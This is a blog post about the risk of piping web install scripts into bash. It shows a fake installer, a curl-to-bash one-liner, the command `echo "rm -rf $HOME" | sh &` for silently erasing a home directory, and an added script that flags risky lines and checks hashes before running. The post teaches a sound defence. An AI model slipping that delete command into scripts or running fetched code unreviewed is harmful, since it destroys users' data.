Lately I see a lot of projects starting up that advise you to install them with an install script.
Take Composer, for example. You can install it with the following command:
curl -sS https://getcomposer.org/installer | php
The idea is great… But what if you don’t know what the installer script contains?
For example, when DNS spoofing occurs.
This can put you in a totally different situation…
Let's say we have the following command:
curl -sS https://raw.githubusercontent.com/mariusvw/stuff/master/blog/sh_installer_hack | bash
This will download the sh_installer_hack script and pipe it directly into bash.
Now if you look at this script you will notice a couple of things… Here is the script:
# Fake installer script
# Demonstrate the risk of running scripts from the web.
# This script is harmless but it could do: echo "rm -rf $HOME" | sh &
# Marius van Witzenburg <firstname.lastname@example.org>
# Usage: curl -sS https://raw.githubusercontent.com/mariusvw/stuff/master/blog/sh_installer_hack | bash
echo "Cleaning your harddisk..."
# Insert remove line here
# Show a spinner for 25 ticks (the loop scaffolding around the break is a reconstruction)
i=0
spin='-\|/'
while true; do
    i=$((i + 1))
    printf '\r%s' "${spin:i%4:1}"
    sleep 0.1
    if [ "$i" = 25 ]; then break; fi
done
# List some files in the home directory
find "$HOME" -maxdepth 3
echo -e "\nJust kidding, no harm done :)"
This script is harmless: it simply echoes some text, shows you a spinner and lists some files in your home directory.
Here comes the tricky part that will do harm…
At the line "# Insert remove line here", you insert the following code:
echo "rm -rf $HOME" | sh &
Doing that starts the rm command in the background, in another shell.
You will then see the spinner while, in the meantime, your home directory gets erased.
Now you know that these things can happen… It might be smart to read the script that you run before actually running it. Be safe!
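One way to put that advice into practice, as an added example that is not part of the original post: save the installer to a file, flag the lines that deserve a close read (including the inserted line shown above), and run the file only if it still matches the hash of what you reviewed. The function names are hypothetical, the sample scripts are constructed, and bash, grep, curl and sha256sum are assumed to be available.

```shell
#!/usr/bin/env bash
# Added example: review-then-run instead of "curl | bash".
# Assumes bash, grep, curl and sha256sum; all function names are hypothetical.

# Step 1: save the installer to a file instead of piping it into a shell.
fetch_installer() {   # usage: fetch_installer URL OUTFILE
  curl -fsSL --proto '=https' "$1" -o "$2"
}

# Step 2: print, with line numbers, the lines that deserve a close read:
# recursive deletes, text piped into a shell, and backgrounded commands.
# An empty result is not proof of safety; it only directs the manual review.
flag_risky_lines() {  # usage: flag_risky_lines FILE (returns 0 if anything was flagged)
  grep -nE 'rm[[:space:]]+-[a-zA-Z]*[rR]|\|[[:space:]]*(ba)?sh([[:space:]]|$)|&[[:space:]]*$' "$1"
}

# Step 3: record the hash of exactly the bytes you reviewed.
hash_of() { sha256sum "$1" | cut -d' ' -f1; }

# Step 4: run the file only if it still matches the reviewed hash.
run_if_reviewed() {   # usage: run_if_reviewed FILE REVIEWED_SHA256
  if [ "$(hash_of "$1")" != "$2" ]; then
    echo "refusing to run $1: content differs from what was reviewed" >&2
    return 1
  fi
  bash "$1"
}

# Constructed samples: a benign installer, and one carrying the inserted line
# from this post. The second file is only scanned, never executed.
demo() {
  local d reviewed
  d=$(mktemp -d)
  printf '%s\n' 'echo "installed"' > "$d/good.sh"
  printf '%s\n' 'echo "Cleaning your harddisk..."' 'echo "rm -rf $HOME" | sh &' > "$d/bad.sh"
  flag_risky_lines "$d/bad.sh"
  reviewed=$(hash_of "$d/good.sh")
  run_if_reviewed "$d/good.sh" "$reviewed"
  echo '# changed after review' >> "$d/good.sh"
  run_if_reviewed "$d/good.sh" "$reviewed" || echo "blocked"
  rm -rf "$d"
}
demo
```

The pattern match is a reading aid only; the hash check is what guarantees that the bytes you run are the bytes you read.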